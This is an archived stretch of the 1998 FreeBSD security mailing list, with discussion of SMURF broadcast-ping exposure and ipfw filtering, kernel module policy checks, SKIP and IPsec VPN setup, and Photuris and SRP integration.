(brain.zeus.leitch.com [204.187.61.32]) by zeus.leitch.com (8.7.5/8.7.3/1.0) with ESMTP id MAA09276 for ; Wed, 27 May 1998 12:04:52 -0400 (EDT) Received: (from woods@localhost) by brain.zeus.leitch.com (8.8.8/8.8.8) id MAA22991; Wed, 27 May 1998 12:04:51 -0400 (EDT) (envelope-from woods@tap.zeus.leitch.com) Date: Wed, 27 May 1998 12:04:51 -0400 (EDT) Message-Id: <199805271604.MAA22991@brain.zeus.leitch.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit From: woods@zeus.leitch.com (Greg A. Woods) To: freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD In-Reply-To: Dave Chapeskie's message of "Mon, May 25, 1998 15:44:39 -0400" regarding "Re: Virus on FreeBSD" id <19980525154439.60457@ddm.on.ca> References: <199805211431.KAA17444@brain.zeus.leitch.com> <199805251518.LAA05684@brain.zeus.leitch.com> <19980525154439.60457@ddm.on.ca> X-Mailer: VM 6.45 under Emacs 20.2.1 Reply-To: freebsd-security@FreeBSD.ORG Organization: Planix, Inc.; Toronto, Ontario; Canada Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk [ On Mon, May 25, 1998 at 15:44:39 (-0400), Dave Chapeskie wrote: ] > Subject: Re: Virus on FreeBSD > > On Mon, May 25, 1998 at 11:18:27AM -0400, Greg A. Woods wrote: > > I meant some way to detect the pattern of code in the *kernel* that is > > necessary to implement a module loader. > > This would be a waste of effort IMHO. When you build the kernel you > check what you are compiling in at the source level (as you've done by > checking what the NO_LKM define actually disables). If someone else has > the ability to change or replace the kernel on you (either on disk or in > memory) then your already screwed and LKMs are the least of your worries > :-) Yeah, I know it's not a really secure thing to do. It's more a matter of verifying that the rules and policies have been adhered to than trying to enforce anything outright. In this case I'm not expecting anything truely underhanded to happen, and if it does then I know that there are other audit trails and countermeasures to deal with them. Here we have possibly a dozen people who might build their own kernel, and some of those same people are also authorized to do maintenance work (such as building new kernels) on production machines. If any of those kernels that contain LKM support get from a desktop machine to a production machine, then I'd like to have some way to detect this. In other environments where the number of such authorized people may be at least an order of magnitude larger, then such simple verification measures can be of real value. The advantages of being able to give people responsibilities and the freedom to carry out those responsibilties, while at the same time not having to manually look over their shoulders 100% of the time, are great. On the other hand I don't hold a whole lot of hope that I can easily implement a tool that will be able to detect code signatures or patterns, even for a given processor family such as those FreeBSD runs on. > In general I find the idea of searching of "code patterns" to be a > waste of effort. Like the guy who wrote a perl script that looked for > code that designed to crash machines using the pentium 'FOOF' bug. The > script looked for the four byte pattern in files... it's real easy to > build up the required four bytes dynamically and then run them (assuming > of course that the memory protection mechanism provided by the OS either > allows executing from the data area or writing to the code area). I'm not too worried about the truely serious and dedicated cracker here. There are other countermeasures to stop them, including insurance coverage and just plain pulling the plug. We need to have protection against shooting ourselves in the foot, which coincidentally will also protect us against the "amateur" crackers and thus keep the insurance policy valid. In my experience with real life crackers, and in my analysis of most of the exploits commonly available, nobody at the amateur level goes to much trouble to hide their tools (most just download the root kit and blast away -- they couldn't write even one of the tools in that kit if they tried). The professionals (industrial espionage, disgruntled employees, etc.) will either try to disguise themselves as amateurs (to give the impression of a lower level of threat), or resort to covert channels and social engineering, from which we have little practical protection, at least through physical and technical controls (this is where people management and insurance policies come in handy again). -- Greg A. Woods +1 416 443-1734 VE3TCP Planix, Inc. ; Secrets of the Weird To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 09:26:16 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA02914 for freebsd-security-outgoing; Wed, 27 May 1998 09:26:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA02868 for ; Wed, 27 May 1998 09:26:04 -0700 (PDT) (envelope-from cschuber@passer.osg.gov.bc.ca) Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.0/8.6.10) id JAA05578; Wed, 27 May 1998 09:23:39 -0700 (PDT) Message-Id: <199805271623.JAA05578@passer.osg.gov.bc.ca> Received: from localhost(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost, id smtpdaagela; Wed May 27 09:23:31 1998 X-Mailer: exmh version 2.0gamma 1/27/96 Reply-to: Cy Schubert - ITSD Open Systems Group X-Sender: cschuber To: Bart Smit cc: "J.A. Terranson" , "'FreeBSD Security'" Subject: Re: SMURF in 2.2.5 In-reply-to: Your message of "Wed, 27 May 1998 10:50:05 +0200." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 27 May 1998 09:22:50 -0700 From: Cy Schubert - ITSD Open Systems Group Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > > On Wed, 27 May 1998, J.A. Terranson wrote: > > > I will not report this to bugtraq untill you guys tell me there's > > a patch... > > Well, sysctl -w net.inet.icmp.bmcastecho=0 does not help, contrary to > what you'd expect from the advisory... What about ipfw? For example, where 123.123.123.0 is your network address, ipfw add deny icmp from 123.123.123.0 to any ipfw add deny icmp from 123.123.123.255 to any or better yet (which will help stop a fraggle attack), ipfw add deny all from 123.123.123.0 to any ipfw add deny all from 123.123.123.255 to any Any thoughts anyone? > > --Bart > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: cschuber@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Government of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 11:49:59 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA00891 for freebsd-security-outgoing; Wed, 27 May 1998 11:49:59 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dingo.cdrom.com (dingo.cdrom.com [204.216.28.145]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA00818 for ; Wed, 27 May 1998 11:49:35 -0700 (PDT) (envelope-from mike@dingo.cdrom.com) Received: from dingo.cdrom.com (localhost [127.0.0.1]) by dingo.cdrom.com (8.8.8/8.8.5) with ESMTP id KAA00931 for ; Wed, 27 May 1998 10:45:10 -0700 (PDT) Message-Id: <199805271745.KAA00931@dingo.cdrom.com> X-Mailer: exmh version 2.0zeta 7/24/97 To: freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD In-reply-to: Your message of "Wed, 27 May 1998 12:04:51 EDT." <199805271604.MAA22991@brain.zeus.leitch.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 27 May 1998 10:45:10 -0700 From: Mike Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > > Here we have possibly a dozen people who might build their own kernel, > and some of those same people are also authorized to do maintenance work > (such as building new kernels) on production machines. If any of those > kernels that contain LKM support get from a desktop machine to a > production machine, then I'd like to have some way to detect this. In > other environments where the number of such authorized people may be at > least an order of magnitude larger, then such simple verification > measures can be of real value. The advantages of being able to give > people responsibilities and the freedom to carry out those > responsibilties, while at the same time not having to manually look over > their shoulders 100% of the time, are great. > > On the other hand I don't hold a whole lot of hope that I can easily > implement a tool that will be able to detect code signatures or > patterns, even for a given processor family such as those FreeBSD runs > on. Depending on the circumstances, 'options INCLUDE_CONFIG_FILE' may be enough of a requirement for you to be happy. -- \\ Sometimes you're ahead, \\ Mike Smith \\ sometimes you're behind. \\ mike@smith.net.au \\ The race is long, and in the \\ msmith@freebsd.org \\ end it's only with yourself. \\ msmith@cdrom.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 11:57:04 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA02482 for freebsd-security-outgoing; Wed, 27 May 1998 11:57:04 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns1.seidata.com (ns1.seidata.com [208.10.211.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA02351 for ; Wed, 27 May 1998 11:56:31 -0700 (PDT) (envelope-from mike@seidata.com) Received: from localhost (mike@localhost) by ns1.seidata.com (8.8.8/8.8.5) with SMTP id OAA11729; Wed, 27 May 1998 14:55:55 -0400 (EDT) Date: Wed, 27 May 1998 14:55:55 -0400 (EDT) From: Mike To: "J.A. Terranson" cc: "'FreeBSD Security'" Subject: Re: Possible DoS opportunity via ping implementation error? In-Reply-To: <01BD88F2.6DDD3A40@w3svcs.mfn.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Tue, 26 May 1998, J.A. Terranson wrote: > I found out that FBSD (2.2.5R) machines will always respond to a > broadcasted echo request. For example: Hmm... Before the advisory and numerous posts here, I thought this was common knowledge. Guess not... My ingorance is probably due to the fact that I have *very* general knowledge on how a SMURF attack actually works (i.e. DoS through massive broadcast replies), but I'm not sure of any details. > W2>ping 10.1.1.255 > PING 10.1.1.255 (10.1.1.255): 56 data bytes > 64 bytes from 10.1.1.20: icmp_seq=1 ttl=255 time=4.746 ms > 64 bytes from 10.1.1.23: icmp_seq=1 ttl=255 time=45.864 ms (DUP!) > lots of these dups... This same type of behavior is exhibited on 2.2.5-R, 2.2.6-R and 3.0-CURRENT boxes here when pinging any boradcast. Although I never knew it was a 'problem' perse, at least now I know how to fix it (manually for release boxes or with a new cvsup for current)... thanks mostly to the efforts of FreeBSD users (warm, fuzzy feeling ensues). Thanks guys. :) --- Mike Hoskins Email: mike@seidata.com SEI Data Network Services, Inc. WWW: http://www.seidata.com P.O. Box 7, 14005 U.S. 50 (BLD2) Voice: 800.925.6746 ex. 251 Dillsboro, IN 47018 Fax: 812.744.8000 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 12:15:01 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA06385 for freebsd-security-outgoing; Wed, 27 May 1998 12:15:01 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dt050n33.san.rr.com (@dt053nd2.san.rr.com [204.210.34.210]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA06307 for ; Wed, 27 May 1998 12:14:40 -0700 (PDT) (envelope-from Studded@san.rr.com) Received: from san.rr.com (Studded@localhost [127.0.0.1]) by dt050n33.san.rr.com (8.8.8/8.8.8) with ESMTP id MAA13921; Wed, 27 May 1998 12:14:29 -0700 (PDT) (envelope-from Studded@san.rr.com) Message-ID: <356C6614.DAB2BCEE@san.rr.com> Date: Wed, 27 May 1998 12:14:28 -0700 From: Studded Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.6-STABLE-0507 i386) MIME-Version: 1.0 To: Janos Mohacsi CC: freebsd-security@FreeBSD.ORG Subject: Re: SRP integration References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Janos Mohacsi wrote: > > Hi! > > Is there anybody doing SRP (Secure Remote Password) integration into the > FreeBSD security system? > If not. How could I join to the team of developers who is maintaining the > security system of FreeBSD? Our Should I send just diffs, if I am ready? The traditional way to submit diffs is to use the send-pr system. A man page is available. If your package is more than 20k or so your PR should contain a description and a pointer to an ftp or www site where the patch can be maintained. Thanks for your interest, Doug -- *** Chief Operations Officer, DALnet IRC network *** *** Proud designer and maintainer of one of the world's largest *** Internet Relay Chat servers with 5,328 simultaneous connections *** Try spider.dal.net on ports 6662-4 (Powered by FreeBSD) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 13:42:44 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA24760 for freebsd-security-outgoing; Wed, 27 May 1998 13:42:44 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.atipa.com (altrox.atipa.com [208.128.22.34]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id NAA24746 for ; Wed, 27 May 1998 13:42:32 -0700 (PDT) (envelope-from freebsd@atipa.com) Received: (qmail 27047 invoked by uid 1017); 27 May 1998 19:39:44 -0000 Date: Wed, 27 May 1998 13:39:44 -0600 (MDT) From: Atipa To: Open Systems Networking cc: freebsd-security@FreeBSD.ORG Subject: Re: SKIP problems In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk OpenBSD just made a vpn command "that makes virtual private networks trivial". I was messing around w/ IPsec and Photurisd and also got really frustrated as well :(. Just FYI. Kevin On Sat, 23 May 1998, Open Systems Networking wrote: > > > Does anyone in this universe have a working SKIP tunnel on FreeBSD > machines? I just spent the last 48 hours with someone trying every > human, chicken, cow voodoo sacrifice possible to get skip going and it > completely fails. We got so far that in the LOGS it looks like it works: > > May 23 01:54:59 pinkfloyd skipd: Calculating Shared secret for > bc4d5980738b6378f26be386261cd9d8 > May 23 01:55:00 pinkfloyd skipd: Done > > When i telnet to him the first time it spews that. To me that looks like > everything is configured. before it was speweing CERT=NULL or something > along those lines. We cannot get this thing working. It says the shared > secret has been calculated and when i telnet or ping, then it just hangs > and times out. Anyone have a working tunnel? Anyone have notes on how to > get it working? > > Frustrated in SKIP-Land > > -- > "I don't do favors, I accumulate debts" > > ===================================| Open Systems Networking And Consulting. > FreeBSD 2.2.6 is available now! | Phone: 316-326-6800 > -----------------------------------| 1402 N. Washington, Wellington, KS-67152 > FreeBSD: The power to serve! | E-Mail: opsys@open-systems.net > http://www.freebsd.org | Consulting-Network Engineering-Security > ===================================| http://open-systems.net > > -----BEGIN PGP PUBLIC KEY BLOCK----- > Version: 2.6.2 > > mQENAzPemUsAAAEH/06iF0BU8pMtdLJrxp/lLk3vg9QJCHajsd25gYtR8X1Px1Te > gWU0C4EwMh4seDIgK9bzFmjjlZOEgS9zEgia28xDgeluQjuuMyUFJ58MzRlC2ONC > foYIZsFyIqdjEOCBdfhH5bmgB5/+L5bjDK6lNdqD8OAhtC4Xnc1UxAKq3oUgVD/Z > d5UJXU2xm+f08WwGZIUcbGcaonRC/6Z/5o8YpLVBpcFeLtKW5WwGhEMxl9WDZ3Kb > NZH6bx15WiB2Q/gZQib3ZXhe1xEgRP+p6BnvF364I/To9kMduHpJKU97PH3dU7Mv > CXk2NG3rtOgLTEwLyvtBPqLnbx35E0JnZc0k5YkABRO0JU9wZW4gU3lzdGVtcyA8 > b3BzeXNAb3Blbi1zeXN0ZW1zLm5ldD4= > =BBjp > -----END PGP PUBLIC KEY BLOCK----- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 15:19:32 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA15018 for freebsd-security-outgoing; Wed, 27 May 1998 15:19:32 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gateman.zeus.leitch.com (gateman.zeus.leitch.com [204.187.61.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA14994 for ; Wed, 27 May 1998 15:19:14 -0700 (PDT) (envelope-from woods@tap.zeus.leitch.com) Received: from zeus.leitch.com (tap.zeus.leitch.com [204.187.61.10]) by gateman.zeus.leitch.com (8.8.5/8.7.3/1.0) with ESMTP id SAA02893 for ; Wed, 27 May 1998 18:18:53 -0400 (EDT) Received: from brain.zeus.leitch.com (brain.zeus.leitch.com [204.187.61.32]) by zeus.leitch.com (8.7.5/8.7.3/1.0) with ESMTP id SAA11146 for ; Wed, 27 May 1998 18:18:52 -0400 (EDT) Received: (from woods@localhost) by brain.zeus.leitch.com (8.8.8/8.8.8) id SAA27165; Wed, 27 May 1998 18:18:52 -0400 (EDT) (envelope-from woods@tap.zeus.leitch.com) Date: Wed, 27 May 1998 18:18:52 -0400 (EDT) Message-Id: <199805272218.SAA27165@brain.zeus.leitch.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit From: woods@zeus.leitch.com (Greg A. Woods) To: freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD In-Reply-To: Mike Smith's message of "Wed, May 27, 1998 10:45:10 -0700" regarding "Re: Virus on FreeBSD " id <199805271745.KAA00931@dingo.cdrom.com> References: <199805271604.MAA22991@brain.zeus.leitch.com> <199805271745.KAA00931@dingo.cdrom.com> X-Mailer: VM 6.45 under Emacs 20.2.1 Reply-To: freebsd-security@FreeBSD.ORG Organization: Planix, Inc.; Toronto, Ontario; Canada Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk [ On Wed, May 27, 1998 at 10:45:10 (-0700), Mike Smith wrote: ] > Subject: Re: Virus on FreeBSD > > Depending on the circumstances, 'options INCLUDE_CONFIG_FILE' may be > enough of a requirement for you to be happy. This certainly does help a lot, but as with any other option it's kinda hard to mandate it. Mandating options is getting easier now though, as we're almost ready to upgrade everything locally to a privately maintained internal version of FreeBSD-stable and people will need very very very good reasons for not using our local source tree. Such an approach has a fair bit of overhead, of course. -- Greg A. Woods +1 416 443-1734 VE3TCP Planix, Inc. ; Secrets of the Weird To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 15:34:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA20020 for freebsd-security-outgoing; Wed, 27 May 1998 15:34:41 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from adk.gr (COREDUMP.CIS.UPENN.EDU [158.130.6.141]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA19863 for ; Wed, 27 May 1998 15:34:14 -0700 (PDT) (envelope-from angelos@dsl.cis.upenn.edu) Received: from dsl.cis.upenn.edu (localhost [127.0.0.1]) by adk.gr (8.8.8/8.8.5) with ESMTP id SAA06292; Wed, 27 May 1998 18:33:38 -0400 (EDT) Message-Id: <199805272233.SAA06292@adk.gr> To: Atipa Cc: Open Systems Networking , freebsd-security@FreeBSD.ORG Subject: Re: SKIP problems In-reply-to: Your message of "Wed, 27 May 1998 13:39:44 MDT." Date: Wed, 27 May 1998 18:33:38 -0400 From: "Angelos D. Keromytis" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- To: Atipa Subject: Re: SKIP problems Cc: Open Systems Networking , Date: 05/27/98, 18:33:37 In message , Atipa w rites: > >OpenBSD just made a vpn command "that makes virtual private networks >trivial". I was messing around w/ IPsec and Photurisd and also got really >frustrated as well :(. > >Just FYI. "Trivial" is probably too strong a statement, but it certainly makes them easier. The biggest step is actually the existance of documentation. I should point out that OpenBSD does *not* use SKIP (nor is it likely to do so in the foreseeable future). - -Angelos -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBNWyUwb0pBjh2h1kFAQF6+wP/eLAUPC/6zu3xH0RIOZlBqbbIPqVNC8H8 IpYGIP3mA1eEKqD71/S0my3uzx04VZ2VyLQxj8s6ohjwbVeitFoB+ZNHybhqGOJz oUQ/yugClZ26tFVwzHjjOjNV5W9Nb9OrpCkZMaDs2OqHQ2PiZSsWfEuS7PPgXUoq VxVcZwTvAeE= =U98k -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 16:04:42 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA27768 for freebsd-security-outgoing; Wed, 27 May 1998 16:04:42 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.atipa.com (altrox.atipa.com [208.128.22.34]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id QAA27686 for ; Wed, 27 May 1998 16:04:16 -0700 (PDT) (envelope-from freebsd@atipa.com) Received: (qmail 27517 invoked by uid 1017); 27 May 1998 22:01:31 -0000 Date: Wed, 27 May 1998 16:01:31 -0600 (MDT) From: Atipa To: "Angelos D. Keromytis" cc: Open Systems Networking , freebsd-security@FreeBSD.ORG Subject: Re: SKIP problems In-Reply-To: <199805272233.SAA06292@adk.gr> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > >OpenBSD just made a vpn command "that makes virtual private networks > >trivial". I was messing around w/ IPsec and Photurisd and also got really > >frustrated as well :(. > > > >Just FYI. > > "Trivial" is probably too strong a statement, but it certainly makes > them easier. The biggest step is actually the existance of > documentation. I should point out that OpenBSD does *not* use SKIP > (nor is it likely to do so in the foreseeable future). > - -Angelos I agree, but the word "trivial" _was_ used. I have yet to try it out. I also agree that the lack of documentation is a huge drawback. There is no continuity between segments. :( What do you recommend for FreeBSD then? SKIP, ssh/ppp, ??? Kevin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 16:10:32 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA28860 for freebsd-security-outgoing; Wed, 27 May 1998 16:10:32 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from adk.gr (COREDUMP.CIS.UPENN.EDU [158.130.6.141]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA28743 for ; Wed, 27 May 1998 16:10:01 -0700 (PDT) (envelope-from angelos@dsl.cis.upenn.edu) Received: from dsl.cis.upenn.edu (localhost [127.0.0.1]) by adk.gr (8.8.8/8.8.5) with ESMTP id TAA15065; Wed, 27 May 1998 19:09:26 -0400 (EDT) Message-Id: <199805272309.TAA15065@adk.gr> To: Atipa Cc: Open Systems Networking , freebsd-security@FreeBSD.ORG Subject: Re: SKIP problems In-reply-to: Your message of "Wed, 27 May 1998 16:01:31 MDT." Date: Wed, 27 May 1998 19:09:26 -0400 From: "Angelos D. Keromytis" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- To: Atipa Subject: Re: SKIP problems Cc: Open Systems Networking , Date: 05/27/98, 19:09:25 In message , Atipa w rites: > >I agree, but the word "trivial" _was_ used. Poetic license and all that. >I have yet to try it out. I use it all the time, but then I'm one of the coders. Expect a FreeBSD port in the next few weeks (unfortunately available only to US citizens). >I also agree that the lack of documentation is a huge drawback. There is no >continuity between segments. :( Yes, but noone likes writing docs (never mind good ones) :-) >What do you recommend for FreeBSD then? SKIP, ssh/ppp, ??? Well, wait for the port. I don't like the SKIP design and philosophy (except for multicast communications), and I think ssh/ppp is a horrible hack. - -Angelos -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBNWydJb0pBjh2h1kFAQFX1gP+LZcT84NgVoJsoGYcvFUGslgupTW+0aEd zhcT62o0xXVF36efI8shBRHqSDxBAAKFs3S7pwdhxL8fw05Xg/CzmGbBKmzFU51j NAU28GBk66zaa1jIaCjIVQjpukF1e2TrdduwzaMLX18YaXEI8qoa/TWgxlTvcrbF lC0v57O0E/E= =SUXt -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 16:42:06 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA05033 for freebsd-security-outgoing; Wed, 27 May 1998 16:42:06 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA04647 for ; Wed, 27 May 1998 16:40:13 -0700 (PDT) (envelope-from mike@sentex.net) Received: from ospf-mdt.sentex.net (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.6/8.6.9) with SMTP id TAA18312; Wed, 27 May 1998 19:38:27 -0400 (EDT) From: mike@sentex.net (Mike Tancsa) To: cschuber@uumail.gov.bc.ca Cc: freebsd-security@FreeBSD.ORG Subject: Re: SMURF in 2.2.5 Date: Wed, 27 May 1998 23:41:40 GMT Message-ID: <356ca296.243683658@mail.sentex.net> References: <199805271623.JAA05578@passer.osg.gov.bc.ca> In-Reply-To: <199805271623.JAA05578@passer.osg.gov.bc.ca> X-Mailer: Forte Agent .99e/32.227 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Wed, 27 May 1998 09:22:50 -0700, in sentex.lists.freebsd.misc you wrote: >What about ipfw? For example, where 123.123.123.0 is your network >address, > >ipfw add deny icmp from 123.123.123.0 to any >ipfw add deny icmp from 123.123.123.255 to any You dont really want to disable all ICMP traffic as it will break some things... If you want to prevent pings from flowing through your FreeBSD box, you can specify something like ipfw add 4000 deny log icmp from any to any icmptype 0,8 to stop echo and echo reply... Also, this does nothing to prevent you from being SMURF attacked.. It only would help prevent you from being used as a source. Think about it, if your network is something like UPSTREAM --------DS1 link ---------your gateway The flood of packets will traverse your DS1 only to be stopped at "your gateway".. bye bye DS1 bandwidth... ---Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 16:59:33 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA09121 for freebsd-security-outgoing; Wed, 27 May 1998 16:59:33 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from implode.root.com (implode.root.com [198.145.90.17]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA09004 for ; Wed, 27 May 1998 16:58:47 -0700 (PDT) (envelope-from root@implode.root.com) Received: from implode.root.com (localhost [127.0.0.1]) by implode.root.com (8.8.5/8.8.5) with ESMTP id QAA10311; Wed, 27 May 1998 16:58:31 -0700 (PDT) Message-Id: <199805272358.QAA10311@implode.root.com> To: andrew@squiz.co.nz (Andrew McNaughton) cc: "J.A. Terranson" , "'FreeBSD Security'" Subject: Re: Possible DoS opportunity via ping implementation error? In-reply-to: Your message of "Wed, 27 May 1998 17:37:46 +1200." From: David Greenman Reply-To: dg@root.com Date: Wed, 27 May 1998 16:58:31 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk >At 3:05 PM 27/5/98, J.A. Terranson wrote: >>I had a very interesting day today! I found out that FBSD (2.2.5R) >>machines will >>always respond to a broadcasted echo request. For example: > >This contradicts the CERT Advisory below which states that FreeBSD does not >have the problem. > >Either the CERT report is wrong, a problem has been introduced since, or >it's specific to the way you've set up your boxes. > >I'd like to know which. ... >>FreeBSD, Inc. >>============= >>In FreeBSD 2.2.5 and up, the tcp/ip stack does not respond to icmp >>echo requests destined to broadcast and multicast addresses by default. This >>behaviour can be changed via the sysctl command via >>mib net.inet.icmp.bmcastecho. The CERT advisory is wrong. FreeBSD has always responded to broadcast ICMP echo requests by default. Further, the option mentioned to disable them was broken in 2.2.x and -current until just yesterday. -DG David Greenman Co-founder/Principal Architect, The FreeBSD Project To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 18:15:52 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA23962 for freebsd-security-outgoing; Wed, 27 May 1998 18:15:52 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from wraith.cs.uow.edu.au (root@wraith.cs.uow.edu.au [130.130.64.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA23916 for ; Wed, 27 May 1998 18:15:32 -0700 (PDT) (envelope-from ncb05@uow.edu.au) Received: from banshee.cs.uow.edu.au (ncb05@banshee.cs.uow.edu.au [130.130.188.1]) by wraith.cs.uow.edu.au (8.9.0.Beta5/8.9.0.Beta5) with SMTP id LAA25608 for ; Thu, 28 May 1998 11:15:22 +1000 (EST) Date: Thu, 28 May 1998 11:15:20 +1000 (EST) From: Nicholas Charles Brawn X-Sender: ncb05@banshee.cs.uow.edu.au To: freebsd-security@FreeBSD.ORG Subject: Photuris Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Is there any work being done to port Photuris over to FreeBSD? If so, is non-US based so I don't have to worry about EAR? :) For those who are unaware what photuris is, from the readme: This is an implementation of the Photuris keymanagement protocol according to the drafts: draft-simpson-photuris-18.txt draft-simpson-photuris-schemes-04.txt It can be obtained from http://www.physnet.uni-hamburg.de/provos/photuris/ Nick -- Email: ncb05@uow.edu.au - DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A http://rabble.uow.edu.au/~nick - public key available on request. Nicholas Brawn - Computer Science Undergraduate, University of Wollongong. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 19:19:10 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA03918 for freebsd-security-outgoing; Wed, 27 May 1998 